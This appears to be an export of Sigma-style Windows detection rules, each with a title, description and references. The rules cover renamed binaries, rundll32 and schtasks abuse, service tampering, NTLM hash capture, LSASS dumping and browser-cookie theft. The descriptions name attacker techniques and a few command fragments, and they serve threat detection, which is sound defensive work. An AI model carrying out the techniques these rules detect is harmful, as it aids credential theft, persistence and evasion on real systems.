Renamed Gpg.EXE Execution Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. https://securelist.com/locked-out/68960/
Renamed Jusched.EXE Execution Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf
Renamed Mavinject.EXE Execution Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
Renamed MegaSync Execution Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. https://redcanary.com/blog/rclone-mega-extortion/
Renamed Msdt.EXE Execution Detects the execution of a renamed "Msdt.exe" binary https://lolbas-project.github.io/lolbas/Binaries/Msdt/
Renamed Microsoft Teams Execution Detects the execution of a renamed Microsoft Teams binary. Internal Research
Renamed NetSupport RAT Execution Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings https://redcanary.com/blog/misbehaving-rats/
Renamed NirCmd.EXE Execution Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.nirsoft.net/utils/nircmd.html
Renamed Office Binary Execution Detects the execution of a renamed office binary https://infosec.exchange/@sbousseaden/109542254124022664
Renamed PAExec Execution Detects execution of renamed version of PAExec. Often used by attackers https://www.poweradmin.com/paexec/, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
Renamed PingCastle Binary Execution Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.pingcastle.com/documentation/scanner/
Renamed Plink Execution Detects the execution of a renamed version of the Plink binary https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html
Visual Studio NodejsTools PressAnyKey Renamed Execution Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5
Potential Renamed Rundll32 Execution Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
Renamed Remote Utilities RAT (RURAT) Execution Detects execution of renamed Remote Utilities (RURAT) via Product PE header field https://redcanary.com/blog/misbehaving-rats/
Renamed SysInternals DebugView Execution Detects suspicious renamed SysInternals DebugView execution https://www.epicturla.com/blog/sysinturla
Renamed ProcDump Execution Detects the execution of a renamed ProcDump executable. This often done by attackers or malware in order to evade defensive mechanisms. https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
Renamed PsExec Service Execution Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM
Renamed Sysinternals Sdelete Execution Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
Renamed Vmnat.exe Execution Detects renamed vmnat.exe or portable version that can be used for DLL side-loading https://twitter.com/malmoeb/status/1525901219247845376
Renamed Whoami Execution Detects the execution of whoami that has been renamed to a different name to avoid detection https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
Capture Credentials with Rpcping.exe Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. https://lolbas-project.github.io/lolbas/Binaries/Rpcping/, https://twitter.com/vysecurity/status/974806438316072960, https://twitter.com/vysecurity/status/873181705024266241, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)
Ruby Inline Command Execution Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Potential Rundll32 Execution With DLL Stored In ADS Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). https://lolbas-project.github.io/lolbas/Binaries/Rundll32
Suspicious Advpack Call Via Rundll32.EXE Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function https://twitter.com/Hexacorn/status/1224848930795552769, http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/
Suspicious Rundll32 Invoking Inline VBScript Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
Rundll32 InstallScreenSaver Execution An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver https://lolbas-project.github.io/lolbas/Libraries/Desk/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl
Suspicious Key Manager Access Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) https://twitter.com/NinjaParanoid/status/1516442028963659777
Rundll32 Execution Without CommandLine Parameters Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity https://www.cobaltstrike.com/help-opsec, https://twitter.com/ber_m1ng/status/1397948048135778309
Mshtml.DLL RunHTMLApplication Suspicious Usage Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) https://twitter.com/n1nj4sec/status/1421190238081277959, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt, http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
Suspicious NTLM Authentication on the Printer Spooler Service Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service https://twitter.com/med0x2e/status/1520402518685200384, https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
Potential Obfuscated Ordinal Call Via Rundll32 Detects execution of "rundll32" with potential obfuscated ordinal calls Internal Research
Rundll32 Spawned Via Explorer.EXE Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. https://redcanary.com/blog/raspberry-robin/, https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Process Memory Dump Via Comsvcs.DLL Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) https://twitter.com/shantanukhande/status/1229348874298388484, https://twitter.com/pythonresponder/status/1385064506049630211?s=21, https://twitter.com/Hexacorn/status/1224848930795552769, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/, https://twitter.com/SBousseaden/status/1167417096374050817, https://twitter.com/Wietze/status/1542107456507203586, https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py
Rundll32 Registered COM Objects load malicious registered COM objects https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md
Suspicious Process Start Locations Detects suspicious process run from unusual locations https://car.mitre.org/wiki/CAR-2013-05-002
Suspicious Rundll32 Setupapi.dll Activity setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. https://lolbas-project.github.io/lolbas/Libraries/Setupapi/, https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf, https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf, https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20
Shell32 DLL Execution in Suspicious Directory Detects shell32.dll executing a DLL in a suspicious directory https://www.group-ib.com/resources/threat-research/red-curl-2.html
Potential ShellDispatch.DLL Functionality Abuse Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
RunDLL32 Spawning Explorer Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way https://redcanary.com/blog/intelligence-insights-november-2021/
Potentially Suspicious Rundll32 Activity Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/, https://twitter.com/Hexacorn/status/885258886428725250, https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://twitter.com/nas_bench/status/1433344116071583746, https://twitter.com/eral4m/status/1479106975967240209, https://twitter.com/eral4m/status/1479080793003671557
Suspicious Control Panel DLL Load Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits https://twitter.com/rikvduijn/status/853251879320662017, https://twitter.com/felixw3000/status/853354851128025088
Suspicious Rundll32 Execution With Image Extension Detects the execution of Rundll32.exe with DLL files masquerading as image files https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
Suspicious Usage Of ShellExec_RunDLL Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009
Suspicious ShellExec_RunDLL Call Via Ordinal Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009, https://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html
ShimCache Flush Detects actions that clear the local ShimCache and remove forensic evidence https://medium.com/@blueteamops/shimcache-flush-89daff28d15e
Suspicious Rundll32 Activity Invoking Sys File Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
Potentially Suspicious Rundll32.EXE Execution of UDL File Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. https://trustedsec.com/blog/oops-i-udld-it-again
Rundll32 Execution With Uncommon DLL Extension Detects the execution of rundll32 with a command line that doesn't contain a common extension https://twitter.com/mrd0x/status/1481630810495139841?s=12
Rundll32 UNC Path Execution Detects rundll32 execution where the DLL is located on a remote location (share) https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Suspicious Workstation Locking via Rundll32 Detects a suspicious call to the user32.dll function that locks the user workstation https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/
Suspicious Modification Of Scheduled Tasks Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload Internal Research, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
Suspicious WebDav Client Execution Via Rundll32.EXE Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 https://twitter.com/aceresponder/status/1636116096506818562, https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/, https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/, https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png, https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
WebDav Client Execution Via Rundll32.EXE Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). https://github.com/OTRF/detection-hackathon-apt29/issues/17, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md
Rundll32 Execution Without Parameters Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module https://bczyz1.github.io/2021/01/30/psexec.html
Run Once Task Execution as Configured in Registry This rule detects the execution of Run Once task as configured in the registry https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/, https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA
Suspicious Schtasks Execution AppData Folder Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Scheduled Task Creation Via Schtasks.EXE Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
Suspicious Scheduled Task Creation Involving Temp Folder Detects the creation of scheduled tasks that involves a temporary folder and runs only once https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
Delete Important Scheduled Task Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities Internal Research
Delete All Scheduled Tasks Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete
Disable Important Scheduled Task Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task, https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/, https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04, https://blog.talosintelligence.com/gophish-powerrat-dcrat/
Schtasks From Suspicious Folders Detects scheduled task creations that have suspicious action command and folder combinations https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical
Suspicious Scheduled Task Name As GUID Detects creation of a scheduled task with a GUID like name https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Uncommon One Time Only Scheduled Task At 00:00 Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
Potential Persistence Via Microsoft Compatibility Appraiser Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
Potential Persistence Via Powershell Search Order Hijacking - Task Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
Scheduled Task Executing Payload from Registry Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Scheduled Task Executing Encoded Payload from Registry Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Suspicious Schtasks Schedule Types Detects scheduled task creations or modification on a suspicious schedule type https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Suspicious Schtasks Schedule Type With High Privileges Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
Suspicious Scheduled Task Creation via Masqueraded XML File Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-, https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml
Suspicious Command Patterns In Scheduled Task Creation Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/, https://twitter.com/RedDrip7/status/1506480588827467785, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
Schtasks Creation Or Modification With SYSTEM Privileges Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
Script Event Consumer Spawning Process Detects a suspicious child process of Script Event Consumer (scrcons.exe). https://redcanary.com/blog/child-processes/, https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html
Possible Privilege Escalation via Weak Service Permissions Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/30/weak-service-permissions/
New Service Creation Using Sc.EXE Detects the creation of a new service using the "sc.exe" utility. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
Service StartupType Change Via Sc.EXE Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
New Kernel Driver Via SC.EXE Detects creation of a new service (kernel driver) with the type "kernel" https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
Interesting Service Enumeration Via Sc.EXE Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors. https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/
Allow Service Access Using Security Descriptor Tampering Via Sc.EXE Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
Deny Service Access Using Security Descriptor Tampering Via Sc.EXE Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
Service DACL Abuse To Hide Services Via Sc.EXE Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
Service Security Descriptor Tampering Via Sc.EXE Detection of sc.exe utility adding a new service with special permission which hides that service. https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
Suspicious Service Path Modification Detects service path modification via the "sc" binary to a suspicious command or path https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
Potential Persistence Attempt Via Existing Service Tampering Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/
Stop Windows Service Via Sc.EXE Detects the stopping of a Windows service via the "sc.exe" utility https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)
Potential Shim Database Persistence via Sdbinst.EXE Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence
Uncommon Extension Shim Database Installation Via Sdbinst.EXE Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md
Sdclt Child Processes A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
Sdiagnhost Calling Suspicious Child Process Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) https://twitter.com/nao_sec/status/1530196847679401984, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/, https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/
Potential Suspicious Activity Using SeCEdit Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit
Suspicious Serv-U Process Pattern Detects a suspicious process pattern which could be a sign of an exploited Serv-U service https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
Uncommon Child Process Of Setres.EXE Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path. https://lolbas-project.github.io/lolbas/Binaries/Setres/, https://twitter.com/0gtweet/status/1583356502340870144, https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)
Potential SPN Enumeration Via Setspn.EXE Detects service principal name (SPN) enumeration used for Kerberoasting https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation, https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019
Setup16.EXE Execution With Custom .Lst File Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living of the land utility. https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/
Suspicious Execution of Shutdown Use of the commandline to shutdown or reboot windows https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
Suspicious Execution of Shutdown to Log Out Detects the rare use of the command line tool shutdown to logoff a user https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
Uncommon Sigverif.EXE Child Process Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution. https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/, https://twitter.com/0gtweet/status/1457676633809330184
Uncommon Child Processes Of SndVol.exe Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) https://twitter.com/Max_Mal_/status/1661322732456353792
Audio Capture via SoundRecorder Detect attacker collecting audio via SoundRecorder application. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html
Suspicious Splwow64 Without Params Detects suspicious Splwow64.exe process without any command line parameters https://twitter.com/sbousseaden/status/1429401053229891590?s=12
Suspicious Spool Service Child Process Detects suspicious print spool service (spoolsv.exe) child processes. https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md
Veeam Backup Database Suspicious Query Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. https://labs.withsecure.com/publications/fin7-target-veeam-servers
VeeamBackup Database Credentials Dump Via Sqlcmd.EXE Detects dump of credentials in VeeamBackup dbo https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html
SQLite Chromium Profile Data DB Access Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/
SQLite Firefox Profile Data DB Access Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/
